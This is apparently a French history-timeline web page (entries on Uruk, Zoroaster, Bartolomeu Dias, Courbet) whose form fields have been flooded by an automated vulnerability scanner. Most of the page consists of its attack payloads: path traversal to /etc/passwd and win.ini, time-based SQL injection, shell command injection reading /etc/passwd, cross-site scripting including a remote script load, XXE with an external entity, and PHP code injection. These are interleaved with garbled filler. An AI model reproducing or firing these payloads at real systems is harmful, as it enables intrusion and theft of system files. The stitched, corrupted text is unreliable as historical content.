\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

les grands evenements

Zoroastre

Zarathoustra -Mazdisme- Ahura Mazda

Mr.

1

En -3300, Uruk est toujours la plus vaste ville du monde, mais elle tend perdre peu peu son rle moteur. En 3100 av. J.-C. souvre une priode assez obscure pendant laquelle aucune ville ne se distingue vraiment

En -3300, Uruk est toujours la plus vaste ville du monde, mais elle tend perdre peu peu son rle moteur. En 3100 av. J.-C. souvre une priode assez obscure pendant laquelle aucune ville ne se distingue vraiment

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

cxvvvvvvv

vvxc

Bartelomeu Dias

passe le cap de Bonne Esprance et entre dans l'ocan Indien

Peiniture

GustaveCourbet expose au Salon de 1853 son tableau les Baigneises

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1'"()&%prompt(941129)

Mr.

1;938439

Mr.'"()&%

1

Mr.;909872

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

response.write(9144258*9708773)

Mr.

'+response.write(9144258*9708773)+'

Mr.

"+response.write(9144258*9708773)+"

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

"+response.write(9144258*9708773)+"

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

response.write(9835505*9479464)

1

'+response.write(9835505*9479464)+'

1

"+response.write(9835505*9479464)+"

1

Mr.

${100254+99434}

Mr.

1

Mr.

1

Mr.

1

Mr.

1

${100282+99953}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

1

Mr.

1

Mr.

'"()

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

)

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Mr.

1some_inexistent_file_with_long_name%00.jpg

'"()

1

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

Mr.

1

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

1

268435455

1

h

1

..

1

1e309

1

;print(md5(acunetix_wvs_security_test));

1

'"\'\");|]*{ <>''

1

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1

Mr.

1"=sleep(4)="

acunetix_wvs_invalid_filename

1

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

frises_creer.php

1

frises_creer.php

1

Mr.

1';select pg_sleep(4); --

frises_creer.php/.

1

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1

Mr.

1

http://www.acunetix.tst

1

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

Mr.

1

Mr.

'"

Mr.

<!--

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

'"

1

<!--

1

Mr.

1

Mr.

1

Mr.' and sleep(4)='

1

Mr.' and (sleep(4)+1) limit 1 --

1

Mr." and sleep(4)="

1

Mr.' or (sleep(4)+1) limit 1 --

1

Mr." or (sleep(4)+1) limit 1 --

1

Mr.'=sleep(4)='

1

Mr."=sleep(4)="

1

Mr.'+(select 1 from (select sleep(4))A)+'

1

Mr. and sleep(4)

1

Mr. or (sleep(4)+1) limit 1 --

1

Mr.

1'"()&%<ScRiPt >prompt(989313)</ScRiPt>

Mr.

1_977690

Mr.';select pg_sleep(4); --

1

Mr.';select pg_sleep(4); --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr."; waitfor delay '0:0:4' --

1

Mr.'"()&%<ScRiPt >prompt(906734)</ScRiPt>

1

Mr._942779

1

Mr._942779

1

acu8886<s1﹥s2ʺs3ʹuca8886

1

acux3969z1z2abcxuca3969

1

Mr.<ScRiPt >prompt(957136)</ScRiPt>

1

Mr.<script>prompt(948079)</script>

1

Mr.<script>prompt(948079)</script>

1

Mr.<script>prompt(948079)</script>

1

Mr.<ScRiPt >prompt(959505)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983265></ScRiPt>

1

Mr.<ScRiPt >prompt(988312)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(965970)">

1

Mr.<video><source onerror="javascript:prompt(965970)">

1

Mr.<video><source onerror="javascript:prompt(965970)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(916331)"></g></svg>

1

Mr.<video><source onerror="javascript:prompt(965970)">

1

Mr.<div style=width:expression(prompt(973522))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='981474'>

1

Mr.<body onload=prompt(983446)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903184)>

1

Mr.<img src=xyz OnErRor=prompt(972726)>

1

Mr.<img/src=">" onerror=alert(981800)>

1

Mr.%3CScRiPt%20%3Eprompt(985708)%3C/sCripT%3E

1

<img acu onmouseover=prompt(930277) //>

1

Mr.<input autofocus onfocus=prompt(979049)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._RbIuV <ScRiPt >prompt(951673)</ScRiPt>

1

acu6052<s1﹥s2ʺs3ʹuca6052

1

acux6478z1z2abcxuca6478

1

acux6478z1z2abcxuca6478

1

acux6478z1z2abcxuca6478

1

Mr.<ScRiPt >prompt(915539)</ScRiPt>

1

Mr.<script>prompt(979505)</script>

1

Mr.<ScRiPt >prompt(936787)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942735></ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942735></ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942735></ScRiPt>

1

Mr.<ScRiPt >prompt(990425)</ScRiPt>

1

Mr.<ScRiPt >prompt(990425)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(939576)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995443)"></g></svg>

1

Mr.<div style=width:expression(prompt(931154))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='953630'>

1

Mr.<body onload=prompt(982854)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935091)>

1

Mr.

1

Mr.<img src=xyz OnErRor=prompt(946151)>

1

Mr.<img/src=">" onerror=alert(983512)>

1

Mr.

1'"

Mr.%3CScRiPt%20%3Eprompt(920395)%3C/sCripT%3E

1

<img acu onmouseover=prompt(919840) //>

1

Mr.<input autofocus onfocus=prompt(950273)>

1

Mr.

\

<a href='http://www.acunetix.com'>website security</a>

1

Mr.

1xa7

[url=http://www.acunetix.com]website security[/url]

1

Mr.

@@H6yvb

Mr._V1hcb <ScRiPt >prompt(977613)</ScRiPt>

1

Mr.

JyI=

Mr.

'"

Mr.

'"

Mr.

'"

Mr.

''""

Mr.

'"

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

1

1'"

1

\

1

1xa7

1

@@bBEK9

1

JyI=

1

'"

1

''""

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.